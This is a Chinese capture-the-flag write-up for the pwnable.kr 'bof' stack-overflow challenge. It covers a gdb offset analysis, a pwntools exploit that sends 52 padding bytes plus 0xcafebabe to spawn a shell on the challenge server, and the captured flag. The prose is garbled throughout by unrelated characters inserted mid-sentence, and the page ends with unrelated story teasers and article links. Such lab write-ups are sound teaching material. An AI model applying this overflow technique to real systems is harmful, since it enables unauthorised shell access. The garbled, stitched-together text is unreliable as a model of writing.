pwnable.kr第三題:bof

pwnable.kr

下載

先將bofbof.c下載下來(lái)衣吠,先檢查下 bof開(kāi)啟的保護(hù)

是真的嚇到锰什,基本能開(kāi)的都開(kāi)了,但是轉(zhuǎn)念一想晨炕,入門級(jí)別沒(méi)有那么惡心人吧衫画,然后看看源代碼

發(fā)現(xiàn),只是要將傳入的0xdeadbeef通過(guò)棧溢出換成0xcafebabe瓮栗,而且在程序里面已經(jīng)有調(diào)用system("/bin/sh")的語(yǔ)句削罩,只要替換成功就能調(diào)用瞄勾,那這些保護(hù)基本也沒(méi)什么意義嘛。

gdb調(diào)試

繼續(xù)單步弥激,輸入AAAAAAAA,之后x/30x $esp查看椊福空間

AASCLL值為41,可以看出微服,我們要覆蓋的地址與輸入地址相差52個(gè)字節(jié).

Exp

from pwn import *

r = remote('pwnable.kr','9000')

buf = 52 * 'A'
buf += p32(0xcafebabe)

r.sendline(buf)

r.interactive()

運(yùn)行下

flag =daddy, I just pwned a buFFer :)

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末趾疚,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子以蕴,更是在濱河造成了極大的恐慌糙麦,老刑警劉巖,帶你破解...
    沈念sama閱讀 206,126評(píng)論 6 481
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件丛肮,死亡現(xiàn)場(chǎng)離奇詭異赡磅,居然都是意外死亡,警方通過(guò)查閱死者的電腦和手機(jī)宝与,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,254評(píng)論 2 382
  • 文/潘曉璐 我一進(jìn)店門焚廊,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái),“玉大人习劫,你說(shuō)我怎么就攤上這事咆瘟。” “怎么了诽里?”我有些...
    開(kāi)封第一講書人閱讀 152,445評(píng)論 0 341
  • 文/不壞的土叔 我叫張陵袒餐,是天一觀的道長(zhǎng)。 經(jīng)常有香客問(wèn)我谤狡,道長(zhǎng)匿乃,這世上最難降的妖魔是什么? 我笑而不...
    開(kāi)封第一講書人閱讀 55,185評(píng)論 1 278
  • 正文 為了忘掉前任豌汇,我火速辦了婚禮幢炸,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘拒贱。我一直安慰自己宛徊,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 64,178評(píng)論 5 371
  • 文/花漫 我一把揭開(kāi)白布逻澳。 她就那樣靜靜地躺著闸天,像睡著了一般。 火紅的嫁衣襯著肌膚如雪斜做。 梳的紋絲不亂的頭發(fā)上苞氮,一...
    開(kāi)封第一講書人閱讀 48,970評(píng)論 1 284
  • 那天,我揣著相機(jī)與錄音瓤逼,去河邊找鬼笼吟。 笑死库物,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的贷帮。 我是一名探鬼主播戚揭,決...
    沈念sama閱讀 38,276評(píng)論 3 399
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼撵枢!你這毒婦竟也來(lái)了民晒?” 一聲冷哼從身側(cè)響起,我...
    開(kāi)封第一講書人閱讀 36,927評(píng)論 0 259
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤锄禽,失蹤者是張志新(化名)和其女友劉穎潜必,沒(méi)想到半個(gè)月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體沃但,經(jīng)...
    沈念sama閱讀 43,400評(píng)論 1 300
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡刮便,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 35,883評(píng)論 2 323
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了绽慈。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 37,997評(píng)論 1 333
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡辈毯,死狀恐怖坝疼,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情谆沃,我是刑警寧澤钝凶,帶...
    沈念sama閱讀 33,646評(píng)論 4 322
  • 正文 年R本政府宣布,位于F島的核電站唁影,受9級(jí)特大地震影響耕陷,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜据沈,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,213評(píng)論 3 307
  • 文/蒙蒙 一哟沫、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧锌介,春花似錦嗜诀、人聲如沸。這莊子的主人今日做“春日...
    開(kāi)封第一講書人閱讀 30,204評(píng)論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)。三九已至崔慧,卻和暖如春拂蝎,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背惶室。 一陣腳步聲響...
    開(kāi)封第一講書人閱讀 31,423評(píng)論 1 260
  • 我被黑心中介騙來(lái)泰國(guó)打工温自, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留玄货,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 45,423評(píng)論 2 352
  • 正文 我出身青樓捣作,卻偏偏與公主長(zhǎng)得像誉结,于是被迫代替她去往敵國(guó)和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子券躁,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 42,722評(píng)論 2 345

推薦閱讀更多精彩內(nèi)容

  • 0x01 fd 文件描述符 0惩坑、1、2分別代表標(biāo)準(zhǔn)輸入也拜、標(biāo)準(zhǔn)輸出和標(biāo)準(zhǔn)錯(cuò)誤以舒,所以輸入0x1234的十進(jìn)制值,再次...
    Nevv閱讀 5,828評(píng)論 0 6
  • pwnable.kr bof 同樣的慢哈,既然有源代碼蔓钟。我們就配合著源代碼來(lái)做題,這樣可能更利于搞懂高級(jí)語(yǔ)言被反匯編之...
    CodeRambler閱讀 407評(píng)論 0 0
  • 目錄 1.解釋self = [super init]方法 容錯(cuò)處理,當(dāng)父類初始化失敗,會(huì)返回一個(gè)nil,表示初始化...
    勇敢的_心_閱讀 1,380評(píng)論 0 4
  • 0x01 Start checksec 的時(shí)候可以看到程序沒(méi)有打開(kāi)任何的安全保護(hù)措施卵贱,然后查看IDA下的匯編代碼滥沫,...
    Nevv閱讀 1,668評(píng)論 0 2
  • 1、文件和目錄: # cd /home 進(jìn)入 '/home' 目錄 # cd .. ...
    XDgbh閱讀 1,992評(píng)論 0 1